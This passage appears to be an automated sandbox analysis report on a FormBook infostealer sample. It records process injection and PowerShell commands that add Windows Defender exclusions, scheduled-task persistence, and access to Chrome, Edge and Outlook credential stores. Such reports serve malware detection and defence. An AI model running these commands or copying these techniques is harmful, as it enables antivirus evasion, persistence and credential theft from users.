                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exeNtOpenFile: Direct from: 0x77462DCC
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exeNtSetInformationThread: Direct from: 0x77462ECC
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exeNtQueryInformationToken: Direct from: 0x77462CAC
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exeNtAllocateVirtualMemory: Direct from: 0x77462BEC
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exeNtOpenKeyEx: Direct from: 0x77462B9C
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeMemory written: C:\Users\user\Desktop\C6Abn5cBei.exe base: 400000 value starts with: 4D5AJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeSection loaded: NULL target: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeSection loaded: NULL target: C:\Windows\SysWOW64\regini.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: NULL target: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: NULL target: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\regini.exeThread register set: target process: 6752Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\regini.exeThread APC queued: target process: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exeJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\C6Abn5cBei.exe"Jump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\zdDlscHlw.exe"Jump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zdDlscHlw" /XML "C:\Users\user\AppData\Local\Temp\tmpE61C.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeProcess created: C:\Users\user\Desktop\C6Abn5cBei.exe "C:\Users\user\Desktop\C6Abn5cBei.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zdDlscHlw" /XML "C:\Users\user\AppData\Local\Temp\tmp175E.tmp"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeProcess created: C:\Users\user\AppData\Roaming\zdDlscHlw.exe "C:\Users\user\AppData\Roaming\zdDlscHlw.exe"Jump to behavior
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exeProcess created: C:\Windows\SysWOW64\regini.exe "C:\Windows\SysWOW64\regini.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\regini.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: mDeEygzSIDmBTP.exe, 00000010.00000000.1800363983.0000000001B00000.00000002.00000001.00040000.00000000.sdmp, mDeEygzSIDmBTP.exe, 00000010.00000002.2688004931.0000000001B01000.00000002.00000001.00040000.00000000.sdmp, mDeEygzSIDmBTP.exe, 00000014.00000000.1942279251.0000000000DE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: mDeEygzSIDmBTP.exe, 00000010.00000000.1800363983.0000000001B00000.00000002.00000001.00040000.00000000.sdmp, mDeEygzSIDmBTP.exe, 00000010.00000002.2688004931.0000000001B01000.00000002.00000001.00040000.00000000.sdmp, mDeEygzSIDmBTP.exe, 00000014.00000000.1942279251.0000000000DE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: mDeEygzSIDmBTP.exe, 00000010.00000000.1800363983.0000000001B00000.00000002.00000001.00040000.00000000.sdmp, mDeEygzSIDmBTP.exe, 00000010.00000002.2688004931.0000000001B01000.00000002.00000001.00040000.00000000.sdmp, mDeEygzSIDmBTP.exe, 00000014.00000000.1942279251.0000000000DE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: 0Program Manager
                Source: mDeEygzSIDmBTP.exe, 00000010.00000000.1800363983.0000000001B00000.00000002.00000001.00040000.00000000.sdmp, mDeEygzSIDmBTP.exe, 00000010.00000002.2688004931.0000000001B01000.00000002.00000001.00040000.00000000.sdmp, mDeEygzSIDmBTP.exe, 00000014.00000000.1942279251.0000000000DE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeQueries volume information: C:\Users\user\Desktop\C6Abn5cBei.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeQueries volume information: C:\Users\user\AppData\Roaming\zdDlscHlw.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 9.2.C6Abn5cBei.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.C6Abn5cBei.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000011.00000002.2686152475.0000000002FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.1874122744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.2688494135.0000000003100000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.2688254517.00000000035A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.1876826679.0000000001620000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.2690431464.0000000004B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.1876572598.00000000014F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.2688146046.0000000003550000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\regini.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\regini.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 9.2.C6Abn5cBei.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.C6Abn5cBei.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000011.00000002.2686152475.0000000002FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.1874122744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.2688494135.0000000003100000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.2688254517.00000000035A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.1876826679.0000000001620000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.2690431464.0000000004B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.1876572598.00000000014F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.2688146046.0000000003550000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Scheduled Task/Job                		1
                Scheduled Task/Job                		412
                Process Injection                		1
                Masquerading                		1
                OS Credential Dumping                		221
                Security Software Discovery                		Remote Services1
